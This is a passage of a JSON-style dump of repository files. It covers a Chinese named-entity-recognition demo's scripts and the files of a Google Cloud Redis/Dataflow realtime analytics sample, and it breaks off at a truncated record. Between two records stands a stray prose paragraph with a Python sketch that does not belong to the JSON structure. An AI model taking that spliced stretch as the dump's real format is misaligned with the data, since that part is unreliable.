vv[2]]\n new_result=[]\n for word in s:\n if len(word)==0:\n varrr=[]\n varrr.append('')\n varrr.append('O')\n new_result.append(varrr)\n continue\n \n if len(word)==1 and word[0]=='\\n':\n varrr=[]\n varrr.append('')\n varrr.append('O')\n new_result.append(varrr)\n continue\n \n\n if word in origin_result.keys():\n begin_label=var_dic[origin_result[word]][0]\n end_label=var_dic[origin_result[word]][1]\n\n for index in range(0, len(word)):\n varrr=[]\n varrr.append(word[index])\n if index==0:\n varrr.append(begin_label)\n else:\n varrr.append(end_label)\n new_result.append(varrr)\n \n else:\n for index in range(0, len(word)):\n varrr=[]\n varrr.append(word[index])\n varrr.append('O')\n new_result.append(varrr)\n\n #write result\n with open('src/main/java/com/ner/demo/txts/jieba_result.txt','w', encoding='utf-8') as f3:\n for nr in new_result:\n # 跳过空格与回车\n # if nr[0][0]=='\\n':continue\n f3.write('{}\\t{}\\n'.format(nr[0], nr[1]))\n\n\n \n\ntransform()"
},
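
After jieba segmentation, `transform_data.py` labels each character of a known entity with a begin/inside tag pair looked up from `chs_eng.txt`. A compact sketch of that per-character labelling (tag names and sample data are illustrative):

```python
# tag_map mirrors the chs_eng.txt layout: entity type -> [begin, inside] tag;
# the sample entity and tag names are illustrative.
def label_word(word, entity_types, tag_map):
    if word in entity_types:
        begin, inside = tag_map[entity_types[word]]
        return [(ch, begin if i == 0 else inside) for i, ch in enumerate(word)]
    return [(ch, 'O') for ch in word]

print(label_word('北京', {'北京': '地名'}, {'地名': ['B-LOC', 'I-LOC']}))
# [('北', 'B-LOC'), ('京', 'I-LOC')]
```
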
{
"alpha_fraction": 0.6142506003379822,
"alphanum_fraction": 0.6314496397972107,
"avg_line_length": 44.33333206176758,
"blob_id": "98eae9f28a16cf9c57d1d678e23922671ed5f574",
"content_id": "4bf0eaf281cbad1dbd04e2b7f69599470ec79274",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 441,
"license_type": "no_license",
"max_line_length": 100,
"num_lines": 9,
"path": "/src/main/java/com/ner/demo/python/test.py",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "import csv\n# 表头\nfield_order = [\"姓名\", '年龄', '性别']\nwith open(\"src/main/java/com/ner/demo/txts/test.csv\", 'w', encoding=\"utf-8\", newline='') as csvfile:\n writer = csv.DictWriter(csvfile, field_order)\n writer.writeheader()\n writer.writerow(dict(zip(field_order, [\"张三\", 20, \"男\"])))\n writer.writerow(dict(zip(field_order, [\"李四\", 10, \"男\"])))\n writer.writerow(dict(zip(field_order, [\"王五\", 30, \"男\"])))"
},
{
"alpha_fraction": 0.7796609997749329,
"alphanum_fraction": 0.790960431098938,
"avg_line_length": 24.285715103149414,
"blob_id": "52bf7eac2ca7578219afd07e8c58ad36a0a7bba0",
"content_id": "1bbfa63d37705d631c2b22129a2221ed67bc8fb2",
"detected_licenses": [],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 177,
"license_type": "no_license",
"max_line_length": 82,
"num_lines": 7,
"path": "/src/main/java/com/ner/demo/interfaces/bilstmcrf.java",
"repo_name": "314894831/nerdemo",
"src_encoding": "UTF-8",
"text": "package com.ner.demo.interfaces;\n\nimport java.io.IOException;\n\npublic interface bilstmcrf {\n public abstract void lstm_train(String path1,String path2) throws IOException;\n}\n"
}
] | 4 |
GoogleCloudPlatform/redis-dataflow-realtime-analytics | https://github.com/GoogleCloudPlatform/redis-dataflow-realtime-analytics | b18b18991b2c63f3bc5fe5480634d99e0f168155 | 5c1314737d117f8d12d0436b41426a67647ad359 | 2192d5f0c8d447a365ae70dbbcfc209083e356f0 | refs/heads/master | 2023-06-26T08:00:12.371574 | 2021-04-19T02:24:47 | 2021-04-19T02:24:47 | 272,503,533 | 26 | 12 | Apache-2.0 | 2020-06-15T17:34:17 | 2023-03-28T19:24:22 | 2023-06-14T22:44:09 | Java | [
{
"alpha_fraction": 0.6839606761932373,
"alphanum_fraction": 0.7019328474998474,
"avg_line_length": 27.91176414489746,
"blob_id": "effc2c16d75ace6520e9ff30635b34e706d51f1a",
"content_id": "d480562417861fdfcd83a25d1c5e3b2a097616c7",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Maven POM",
"length_bytes": 2949,
"license_type": "permissive",
"max_line_length": 104,
"num_lines": 102,
"path": "/dashboard/pom.xml",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "<?xml version=\"1.0\" encoding=\"UTF-8\"?>\n<!--\n ~ Copyright 2020 Google LLC\n ~\n ~ Licensed under the Apache License, Version 2.0 (the \"License\");\n ~ you may not use this file except in compliance with the License.\n ~ You may obtain a copy of the License at\n ~\n ~ http://www.apache.org/licenses/LICENSE-2.0\n ~\n ~ Unless required by applicable law or agreed to in writing, software\n ~ distributed under the License is distributed on an \"AS IS\" BASIS,\n ~ WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n ~ See the License for the specific language governing permissions and\n ~ limitations under the License.\n -->\n\n<project xmlns=\"http://maven.apache.org/POM/4.0.0\" xmlns:xsi=\"http://www.w3.org/2001/XMLSchema-instance\"\n\txsi:schemaLocation=\"http://maven.apache.org/POM/4.0.0 https://maven.apache.org/xsd/maven-4.0.0.xsd\">\n\t<modelVersion>4.0.0</modelVersion>\n\t<parent>\n\t\t<groupId>org.springframework.boot</groupId>\n\t\t<artifactId>spring-boot-starter-parent</artifactId>\n\t\t<version>2.1.9.RELEASE</version>\n\t\t<relativePath/> <!-- lookup parent from repository -->\n\t</parent>\n\t<groupId>com.google.cloud.example.realtimedash</groupId>\n\t<artifactId>dashboard</artifactId>\n\t<version>0.0.1-SNAPSHOT</version>\n\t<name>dashboard</name>\n\t<description>realtime dashboard for web metrics from cloud memorystore</description>\n\n\t<properties>\n\t\t<java.version>1.8</java.version>\n\t</properties>\n\n\t<dependencies>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot</groupId>\n\t\t\t<artifactId>spring-boot-starter-data-redis</artifactId>\n\t\t</dependency>\n\t\t<dependency>\n\t\t\t<groupId>org.springframework.boot</groupId>\n\t\t\t<artifactId>spring-boot-starter-web</artifactId>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>redis.clients</groupId>\n\t\t\t<artifactId>jedis</artifactId>\n\t\t\t<version>2.10.2</version>\n\t\t\t<type>jar</type>\n\t\t\t<scope>compile</scope>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>com.google.auto.value</groupId>\n\t\t\t<artifactId>auto-value</artifactId>\n\t\t\t<version>1.2</version>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>joda-time</groupId>\n\t\t\t<artifactId>joda-time</artifactId>\n\t\t\t<version>2.10.5</version>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>com.google.guava</groupId>\n\t\t\t<artifactId>guava</artifactId>\n\t\t\t<version>30.1.1-jre</version>\n\t\t</dependency>\n\n\t\t<dependency>\n\t\t\t<groupId>com.fasterxml.jackson.datatype</groupId>\n\t\t\t<artifactId>jackson-datatype-joda</artifactId>\n\t\t\t<version>2.9.5</version>\n\t\t</dependency>\n\n\t</dependencies>\n\n\t<build>\n\t\t<plugins>\n\t\t\t<plugin>\n\t\t\t\t<groupId>org.springframework.boot</groupId>\n\t\t\t\t<artifactId>spring-boot-maven-plugin</artifactId>\n\t\t\t\t<configuration>\n\t\t\t\t\t<mainClass>com.google.cloud.solutions.realtimedash.dashboard.DashboardApplication\n\t\t\t\t\t</mainClass>\n\t\t\t\t\t<layout>ZIP</layout>\n\t\t\t\t</configuration>\n\t\t\t\t<executions>\n\t\t\t\t\t<execution>\n\t\t\t\t\t\t<goals>\n\t\t\t\t\t\t\t<goal>repackage</goal>\n\t\t\t\t\t\t</goals>\n\t\t\t\t\t</execution>\n\t\t\t\t</executions>\n\t\t\t</plugin>\n\t\t</plugins>\n\t</build>\n\n</project>\n"
},
{
"alpha_fraction": 0.7349498271942139,
"alphanum_fraction": 0.7466555237770081,
"avg_line_length": 34.17647171020508,
"blob_id": "9c04b1941c312e7b0786f6d57317228f00aaa211",
"content_id": "84222b4785a0e41febfd9a43bfcadade8ad1e83f",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Shell",
"length_bytes": 1196,
"license_type": "permissive",
"max_line_length": 96,
"num_lines": 34,
"path": "/processor/deploy_dataflow.sh",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "#!/usr/bin/env bash\n#\n# Copyright 2020 Google LLC\n#\n# Licensed under the Apache License, Version 2.0 (the \"License\");\n# you may not use this file except in compliance with the License.\n# You may obtain a copy of the License at\n#\n# http://www.apache.org/licenses/LICENSE-2.0\n#\n# Unless required by applicable law or agreed to in writing, software\n# distributed under the License is distributed on an \"AS IS\" BASIS,\n# WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n# See the License for the specific language governing permissions and\n# limitations under the License.\n#\n\nmvn clean compile exec:java \\\n -Dexec.mainClass=com.google.cloud.solutions.realtimedash.pipeline.MetricsCalculationPipeline \\\n -Dexec.cleanupDaemonThreads=false \\\n -Dmaven.test.skip=true \\\n -Dexec.args=\" \\\n--project=$PROJECT_ID \\\n--runner=DataflowRunner \\\n--stagingLocation=gs://$TEMP_GCS_BUCKET/stage/ \\\n--tempLocation=gs://$TEMP_GCS_BUCKET/temp/ \\\n--inputTopic=projects/$PROJECT_ID/topics/$APP_EVENTS_TOPIC \\\n--workerMachineType=n1-standard-4 \\\n--region=$REGION_ID \\\n--subnetwork=regions/$REGION_ID/subnetworks/$VPC_NETWORK_NAME \\\n--redisHost=$REDIS_IP \\\n--redisPort=6379 \\\n--streaming\\\n\"\n"
},
{
"alpha_fraction": 0.7321076989173889,
"alphanum_fraction": 0.7373604774475098,
"avg_line_length": 26.690908432006836,
"blob_id": "498be551d8aeadf626bc04819e496fb66d47060d",
"content_id": "b098553e2736b5bcfe9fdceb3f0741fc429717f3",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1523,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 55,
"path": "/dashboard/src/main/java/com/google/cloud/solutions/realtimedash/dashboard/OverlapMetric.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.dashboard;\n\nimport com.google.auto.value.AutoValue;\nimport com.google.common.collect.ImmutableSet;\n\n@AutoValue\npublic abstract class OverlapMetric {\n\n public abstract ImmutableSet<String> getDimensions();\n\n public abstract Double getMetric();\n\n\n public static Builder builder() {\n return new AutoValue_OverlapMetric.Builder();\n }\n\n @AutoValue.Builder\n public abstract static class Builder {\n\n public abstract Builder setMetric(Double newMetric);\n\n public Builder setMetric(float newMetric) {\n return setMetric((double) newMetric);\n }\n\n public Builder setMetric(int newMetric) {\n return setMetric((double) newMetric);\n }\n\n public Builder setMetric(long newMetric) {\n return setMetric((double) newMetric);\n }\n\n public abstract Builder setDimensions(ImmutableSet<String> dimensions);\n\n public abstract OverlapMetric build();\n }\n}\n"
},
{
"alpha_fraction": 0.7252061367034912,
"alphanum_fraction": 0.732273280620575,
"avg_line_length": 43.68421173095703,
"blob_id": "f7f043dfcf4e324515d6d60fad1631e1bea02f77",
"content_id": "c05342f23eff7910c371ee0ff4a865cb94d0d59c",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Markdown",
"length_bytes": 8492,
"license_type": "permissive",
"max_line_length": 222,
"num_lines": 190,
"path": "/README.md",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "## Realtime Analytics using Dataflow and Cloud Memorystore (Redis)\n\nIn today’s fast-paced world, there is emphasis on getting instant insights.\nTypical use-cases involve SaaS operators providing real-time metrics for their KPIs\nor marketeers' need for quick insights on performance of their offers or experiments on the website.\n\nThis solution will demonstrate how to build a real-time website analytics dashboard on GCP.\n\n\n### Components\n\n**User events / Message bus** provides system decoupling, [Pub/Sub](https://cloud.google.com/pubsub)\n is a fully managed message/event bus and provides an easy way to handle the fast click-stream \n generated by typical websites. The click-stream contains signals which can be processed to derive \n insights in real time. \n\n**Metrics processing pipeline** is required to process the click-stream from Pub/Sub into the \n metrics database. [Dataflow](https://cloud.google.com/dataflow) will be used, which is a \n serverless, fully managed processing service supporting real-time streaming jobs. \n\n**Metrics Database**, needs to be an in-memory database to support real-time use-cases. \n Some common web analytic metrics are unique visitors, number of active experiments, conversion rate \n of each experiment, etc. The common theme is to calculate uniques, i.e. Cardinality counting, \n although from a marketeer's standpoint a good estimation is sufficient, the \n [HyperLogLog](https://en.wikipedia.org/wiki/HyperLogLog) algorithm is an efficient solution to the \n count-unique problem by trading off some accuracy.\n \n[Cloud Memorystore (Redis)](https://cloud.google.com/memorystore/docs/redis/redis-overview) provides \n a slew of in-built functions for sets and cardinality measurement, alleviating the need to perform \n them in code. \n \nThe analytics reporting and visualization makes the reports available to the marketeer easily. \nA **Spring dashboard application** is used for demo purposes only. The application uses \n[Jedis](https://github.com/xetorthio/jedis) client to access metrics from Redis using \n[`scard`](https://redis.io/commands/scard) and \n[`sinterstore`](https://redis.io/commands/sinterstore) commands for identifying user overlap and \nother cardinality values. It then uses Javascript based web-ui to render graphs using \n[Google Charts](https://developers.google.com/chart) library.\n\n## Video Tutorial\n| Part 1 | Part 2 |\n| ------ | ------ |\n| [](https://www.youtube.com/watch?v=7NvgleOy480) | [](https://www.youtube.com/watch?v=FyDNn7gZNi4) |\n\n## Quick Start\n[](https://console.cloud.google.com/cloudshell/editor?cloudshell_git_repo=https://github.com/GoogleCloudPlatform/redis-dataflow-realtime-analytics.git)\n\n### Setup Environment\n1. Clone this repository\n ```shell script\n git clone https://github.com/GoogleCloudPlatform/redis-dataflow-realtime-analytics.git\n cd redis-dataflow-realtime-analytics\n ```\n2. Update and activate all environment variables in `set_variables.sh`\n ```shell script\n source set_variables.sh\n ```\n3. 
Enable required Cloud products\n ```shell script\n gcloud services enable \\\n compute.googleapis.com \\\n pubsub.googleapis.com \\\n redis.googleapis.com \\\n dataflow.googleapis.com \\\n storage-component.googleapis.com\n ```\n### Create Pub/Sub Topic\nPub/Sub is a global message bus enabling easy message consumption in a decoupled fashion.\nCreate a Pub/Sub topic to receive application instrumentation messages\n```shell script\ngcloud pubsub topics create $APP_EVENTS_TOPIC --project $PROJECT_ID\n```\n### Create VPC network\nProtecting the Redis instance is important as it does not provide any protections from external entities.\n\n1. Creating a sepate VPC network with external ingress blocked by a firewall provides basic security for the instance. \n ```shell script\n gcloud compute networks create $VPC_NETWORK_NAME \\\n --subnet-mode=auto \\\n --bgp-routing-mode=regional\n ```\n2. Create Firewall rule to enable SSH\n ```shell script\n gcloud compute firewall-rules create allow-internal-ssh \\\n --network $VPC_NETWORK_NAME \\\n --allow tcp:22,icmp\n ```\n \n### Configure Cloud Memorystore\n[Cloud Memorystore](https://cloud.google.com/memorystore) provides a fully managed [Redis](https://redis.io/) database.\nRedis is a NoSQL In-Memory database, which offers comprehensive in-built functions for\n [SETs](https://redis.io/commands#set) operations, \n including efficient HLL operations for cardinality measurement. \n\n1. Create Redis instance in Memorystore. \n ```shell script\n gcloud redis instances create $REDIS_NAME \\\n --size=1 \\\n --region=$REGION_ID \\\n --zone=\"$ZONE_ID\" \\\n --network=$VPC_NETWORK_NAME \\\n --tier=standard\n ```\n > Be patient, this can take some time.\n2. Capture instance's IP to configure the Dataflow and Visualization application \n ```shell script\n export REDIS_IP=\"$(gcloud redis instances describe $REDIS_NAME --region=$REGION_ID \\\n | grep host \\\n | sed 's/host: //')\"\n ```\n\n### Start Analytics pipeline\nThe analytic metrics pipeline will read click-stream messages from Pub/Sub and update metrics in the Redis database in real-time. The visualization application can then use the Redis database for the dashboard.\n\n1. Create Cloud Storage bucket for temporary and staging area for the pipeline\n ```shell script\n gsutil mb -l $REGION_ID -p $PROJECT_ID gs://$TEMP_GCS_BUCKET\n ```\n2. Launch the pipeline using [Maven](https://apache.org/maven)\n ```shell script\n cd processor\n ``` \n ```shell script\n mvn clean compile exec:java \\\n -Dexec.mainClass=com.google.cloud.solutions.realtimedash.pipeline.MetricsCalculationPipeline \\\n -Dexec.cleanupDaemonThreads=false \\\n -Dmaven.test.skip=true \\\n -Dexec.args=\" \\\n --streaming \\\n --project=$PROJECT_ID \\\n --runner=DataflowRunner \\\n --stagingLocation=gs://$TEMP_GCS_BUCKET/stage/ \\\n --tempLocation=gs://$TEMP_GCS_BUCKET/temp/ \\\n --inputTopic=projects/$PROJECT_ID/topics/$APP_EVENTS_TOPIC \\\n --workerMachineType=n1-standard-4 \\\n --region=$REGION_ID \\\n --subnetwork=regions/$REGION_ID/subnetworks/$VPC_NETWORK_NAME \\\n --redisHost=$REDIS_IP \\\n --redisPort=6379\"\n ```\n\n### Start the dummy website events generator\nThe dummy event generator is a Python executable, which needs to keep running, this can be achieved by launching the generator in a __separate shell session__.\n\n1. 
Create and initialize a new python3 virtual environment (you need to have `pyhton3-venv` package)\n ```shell script\n python3 -m venv ~/generator-venv\n source ~/generator-venv/bin/activate \n pip install -r loggen/requirements.txt \n ```\n2. Run the logs generator\n ```shell script\n python loggen/message_generator.py \\\n --topic $APP_EVENTS_TOPIC \\\n --project-id $PROJECT_ID \\\n --enable-log true\n ```\n\n### Run the Visualization Engine\nUse the simple reporting application located in `dashboard/` folder, built using SpringBoot and simple HTML+JS based UI. \n\nThe application reads the metrics from the Redis database and makes it available to the dashboard UI.\nThe Application server needs to be on the same VPC network as the Redis server, to achieve this for demo purposes, \nwe will use a Proxy VM to tunnel the ports to Cloud Shell VM, as its not on the same network.\n \n1. Create a VM to act as proxy\n ```shell script\n gcloud compute instances create proxy-server \\\n --zone $ZONE_ID \\\n --image-family debian-10 \\\n --image-project debian-cloud \\\n --network $VPC_NETWORK_NAME\n ``` \n2. Start SSH port forwarding\n ```shell script\n gcloud compute ssh proxy-server --zone $ZONE_ID -- -N -L 6379:$REDIS_IP:6379 -4 &\n ```\n3. Start the Visualization Spring boot application.\n ```shell script\n cd dashboard/\n mvn clean compile package spring-boot:run\n ```\n4. Click on the  icon to open [web preview](https://cloud.google.com/shell/docs/using-web-preview),\n to access the application's web-ui in the browser.\n \n a. Click \"Preview on port 8080\" \n b. On the dashboard, click \"Auto Update\" which will keep the dashboard fresh.\n \n __Sample Dashbaord__\n \n"
},
{
"alpha_fraction": 0.7516930103302002,
"alphanum_fraction": 0.7577125430107117,
"avg_line_length": 28.53333282470703,
"blob_id": "27e57ea39e0a52701e597228943551e192c71796",
"content_id": "6d579f0042b993c14d522911311a8bdc247a38f4",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1329,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 45,
"path": "/processor/src/main/java/com/google/cloud/solutions/realtimedash/pipeline/MetricsPipelineOptions.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.pipeline;\n\nimport org.apache.beam.sdk.options.Description;\nimport org.apache.beam.sdk.options.PipelineOptions;\nimport org.apache.beam.sdk.options.Validation;\n\n/**\n * A Streaming pipeline option for the Metrics calculation pipeline.\n */\npublic interface MetricsPipelineOptions extends PipelineOptions {\n\n @Description(\"The Cloud Pub/Sub topic to read from.\")\n @Validation.Required\n String getInputTopic();\n\n void setInputTopic(String value);\n\n @Description(\"Redis Host\")\n @Validation.Required\n String getRedisHost();\n\n void setRedisHost(String redisHost);\n\n @Description(\"Redis Port\")\n @Validation.Required\n Integer getRedisPort();\n\n void setRedisPort(Integer redisPort);\n}\n"
},
{
"alpha_fraction": 0.7122641801834106,
"alphanum_fraction": 0.71552973985672,
"avg_line_length": 35.02614212036133,
"blob_id": "e67d718729577a08dfb79708182b838cf9354d03",
"content_id": "c5bde5ce1f3c266f47c7b2e0e1472051176b6744",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 5512,
"license_type": "permissive",
"max_line_length": 99,
"num_lines": 153,
"path": "/dashboard/src/main/java/com/google/cloud/solutions/realtimedash/dashboard/TimeseriesMetricsController.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.dashboard;\n\nimport static com.google.common.collect.ImmutableSet.toImmutableSet;\n\nimport com.google.common.base.Joiner;\nimport com.google.common.collect.ImmutableList;\nimport com.google.common.collect.ImmutableSet;\nimport com.google.common.collect.Sets;\nimport java.util.Arrays;\nimport java.util.List;\nimport java.util.Set;\nimport java.util.stream.IntStream;\nimport org.joda.time.DateTime;\nimport org.joda.time.DateTimeZone;\nimport org.joda.time.Duration;\nimport org.springframework.web.bind.annotation.GetMapping;\nimport org.springframework.web.bind.annotation.RequestMapping;\nimport org.springframework.web.bind.annotation.RequestParam;\nimport org.springframework.web.bind.annotation.RestController;\nimport redis.clients.jedis.Jedis;\n\n@RestController\n@RequestMapping(\"/metrics/timeseries\")\npublic class TimeseriesMetricsController {\n\n private static final String REDIS_NIL = \"(nil)\";\n private static final String DEFAULT_REPORT_TIME_MINUTE = \"10\";\n\n @GetMapping(\"/visits\")\n public ImmutableList<TimeSeriesMetric> visits(Jedis redisClient,\n @RequestParam(required = false, defaultValue = DEFAULT_REPORT_TIME_MINUTE) int lastMinutes) {\n DateTime[] times = timePatternForLastMinutes(lastMinutes);\n\n List<String> values = redisClient\n .mget(TimeSeriesKeyBuilder.forPrefix(\"visitCounter\").buildTimeKeys(times));\n\n ImmutableList.Builder<TimeSeriesMetric> visitsMetricBuilder = ImmutableList.builder();\n\n for (int index = 0; index < times.length; index++) {\n int value = getIntValue(values.get(index));\n\n visitsMetricBuilder\n .add(TimeSeriesMetric.builder().setTimestamp(times[index]).setMetric(value).build());\n }\n\n return visitsMetricBuilder.build();\n }\n\n private Integer getIntValue(String value) {\n return (value == null || value.equals(REDIS_NIL)) ? 
0 : Integer.valueOf(value);\n }\n\n @GetMapping(\"/users\")\n public ImmutableList<TimeSeriesMetric> users(Jedis redisClient,\n @RequestParam(required = false, defaultValue = DEFAULT_REPORT_TIME_MINUTE) int lastMinutes) {\n ImmutableList.Builder<TimeSeriesMetric> usersMetricBuilder = ImmutableList.builder();\n\n TimeSeriesKeyBuilder keyBuilder = TimeSeriesKeyBuilder.forPrefix(\"hll_dthr\");\n\n for (DateTime time : timePatternForLastMinutes(lastMinutes)) {\n usersMetricBuilder.add(\n TimeSeriesMetric\n .builder()\n .setTimestamp(time)\n .setMetric(redisClient.pfcount(keyBuilder.buildTimeKey(time)))\n .build());\n }\n\n return usersMetricBuilder.build();\n }\n\n @GetMapping(\"/experiments\")\n public ImmutableList<TimeSeriesMetric> recentExperiments(Jedis redisClient,\n @RequestParam(required = false, defaultValue = DEFAULT_REPORT_TIME_MINUTE) int lastMinutes) {\n TimeSeriesKeyBuilder keyBuilder = TimeSeriesKeyBuilder\n .forPrefix(\"set_experiments_experiments\");\n\n ImmutableList.Builder<TimeSeriesMetric> experimentsMetricBuilder = ImmutableList.builder();\n\n for (DateTime time : timePatternForLastMinutes(lastMinutes)) {\n long value = redisClient.scard(keyBuilder.buildTimeKey(time));\n\n experimentsMetricBuilder.add(\n TimeSeriesMetric.builder()\n .setTimestamp(time)\n .setMetric(value)\n .build());\n }\n\n return experimentsMetricBuilder.build();\n }\n\n @GetMapping(\"/variantsOverlap\")\n public ImmutableSet<OverlapMetric> variantOverlap(Jedis redisClient) {\n Set<String> variants = redisClient.keys(\"set_var_*\");\n\n if (variants == null || variants.size() == 0) {\n return ImmutableSet.of();\n }\n\n return Sets.combinations(variants, 2)\n .stream()\n .map(variantCombination -> variantCombination.toArray(new String[0]))\n .map(variantCombination -> {\n\n String sinterStoreKey = Joiner.on(\"-\").join(\"overlap_\", variantCombination);\n\n redisClient.sinterstore(sinterStoreKey, variantCombination);\n\n ImmutableSet<String> variantCombinationSet\n = Arrays.stream(variantCombination).map(name -> name.replaceFirst(\"set_var_\", \"\"))\n .collect(toImmutableSet());\n\n return OverlapMetric.builder()\n .setDimensions(variantCombinationSet)\n .setMetric(redisClient.scard(sinterStoreKey))\n .build();\n })\n .collect(toImmutableSet());\n }\n\n @GetMapping(\"/times\")\n public DateTime[] getTimeString(\n @RequestParam(required = false, defaultValue = \"10\") Integer lastMinutes) {\n return timePatternForLastMinutes(lastMinutes);\n }\n\n private static DateTime[] timePatternForLastMinutes(int pastMinutes) {\n DateTime startTime = DateTime.now(DateTimeZone.UTC).minuteOfHour().roundFloorCopy();\n\n return IntStream.rangeClosed(1, pastMinutes)\n .boxed()\n .map(Duration::standardMinutes)\n .map(startTime::minus)\n .toArray(DateTime[]::new);\n }\n}\n"
},
{
"alpha_fraction": 0.7240583896636963,
"alphanum_fraction": 0.7302075624465942,
"avg_line_length": 29.255813598632812,
"blob_id": "304f06bc333fb5bf0db39fd25075f8406ea0d0b6",
"content_id": "2fcebee96d92bda317454e58970149b76296e576",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Java",
"length_bytes": 1301,
"license_type": "permissive",
"max_line_length": 75,
"num_lines": 43,
"path": "/dashboard/src/main/java/com/google/cloud/solutions/realtimedash/dashboard/TimeSeriesKeyBuilder.java",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
"text": "/*\n * Copyright 2020 Google LLC\n *\n * Licensed under the Apache License, Version 2.0 (the \"License\");\n * you may not use this file except in compliance with the License.\n * You may obtain a copy of the License at\n *\n * http://www.apache.org/licenses/LICENSE-2.0\n *\n * Unless required by applicable law or agreed to in writing, software\n * distributed under the License is distributed on an \"AS IS\" BASIS,\n * WITHOUT WARRANTIES OR CONDITIONS OF ANY KIND, either express or implied.\n * See the License for the specific language governing permissions and\n * limitations under the License.\n */\n\npackage com.google.cloud.solutions.realtimedash.dashboard;\n\nimport java.util.Arrays;\nimport org.joda.time.DateTime;\n\npublic class TimeSeriesKeyBuilder {\n\n private final String dateTimeFormatter;\n\n private TimeSeriesKeyBuilder(String prefix) {\n this.dateTimeFormatter = \"'\" + prefix + \"'\" + \"_yyyy_MM_dd'T'HH_mm\";\n }\n\n public String buildTimeKey(DateTime dateTime) {\n return dateTime.toString(dateTimeFormatter);\n }\n\n public String[] buildTimeKeys(DateTime[] dateTimes) {\n return Arrays.stream(dateTimes)\n .map(this::buildTimeKey)\n .toArray(String[]::new);\n }\n\n public static TimeSeriesKeyBuilder forPrefix(String prefix) {\n return new TimeSeriesKeyBuilder(prefix);\n }\n}\n"
},
{
"alpha_fraction": 0.6607452630996704,
"alphanum_fraction": 0.6722270250320435,
"avg_line_length": 33.44776153564453,
"blob_id": "130ab7030808e46c56940980b9c0ab475b88ac56",
"content_id": "eb79a3516917b1a57e4fa2d1045a68404af91036",
"detected_licenses": [
"Apache-2.0"
],
"is_generated": false,
"is_vendor": false,
"language": "Python",
"length_bytes": 4616,
"license_type": "permissive",
"max_line_length": 81,
"num_lines": 134,
"path": "/loggen/message_generator.py",
"repo_name": "GoogleCloudPlatform/redis-dataflow-realtime-analytics",
"src_encoding": "UTF-8",
